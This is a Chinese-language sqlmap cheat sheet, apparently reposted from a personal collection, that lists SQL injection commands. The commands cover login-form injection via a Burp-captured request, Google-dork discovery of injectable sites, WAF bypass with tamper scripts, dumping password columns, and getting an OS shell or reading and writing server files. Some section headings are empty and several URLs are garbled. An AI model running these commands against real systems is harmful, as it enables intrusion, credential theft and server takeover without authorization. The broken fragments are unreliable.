一、SQLMAP用于Access数据库注入
二、SQLMAP用于Cookie注入
三、SQLMAP用于mysql中DDOS攻击
四、SQLMAP用于mysql注入
五、SQLMAP中post登陆框注入1. 浏览器打开目标地址http:// www. /Login.asp 2. 配置burp代理(127.0.0.1:8080)以拦截请求 3. 点击login表单的submit按钮 4. 这时候Burp会拦截到了我们的登录POST请求 5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下 6. 运行sqlmap并使用如下命令:
自动搜索注入:
sqlmap - u [ url ]http : / / testasp.vulnweb.com / Login.asp[ / url ] --forms 指定参数注入:
sqlmap - u [ url ]http : / / testasp.vulnweb.com / Login.asp[ / url ] --data "tfUName=321&tfUPass=321" 六、SQLMAP中Google搜索注入sqlmap - g inurl : php? id = 七、SQLMAP中的请求延迟参数 --delay --safe-freq
python sqlmap.py --dbs -u "http:///index.php/Index/view/id/40.html" --delay 1 python sqlmap.py --dbs -u "http:///index.php/Index/view/id/40.html" --safe-freq 3 八、SQLMAP绕过WAF防火墙sqlmap - u [ url ]http : / / 192.1 68.1 59.1 / news.php? id = 1 [ / url ] - v 3 --dbs --batch --tamper "space2morehash.py" space2morehash.py中可以替换space2hash.py或者base64encode.py或者charencode.py 都是编码方式 space2hash.py base64encode.py charencode.py 九、SQLMAP查看权限
十、SQLMAP伪静态注入(1) 查找数据库
python sqlmap.py - u "http:///index.php/Index/view/id/40.html" - D dataname - T tablename - C "password" --dump 十一、SQLMAP注入点执行命令与交互写shellsqlmap - u [ url ]http : / / 192.1 68.1 59.1 / news.php? id = 1 [ / url ] --os-cmd=ipconfig sqlmap - u [ url ]http : / / 192.1 68.1 59.1 / news.php? id = 1 [ / url ] --os-shell –file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径) –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell) –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
|
|
来自: python_lover > 《待分类》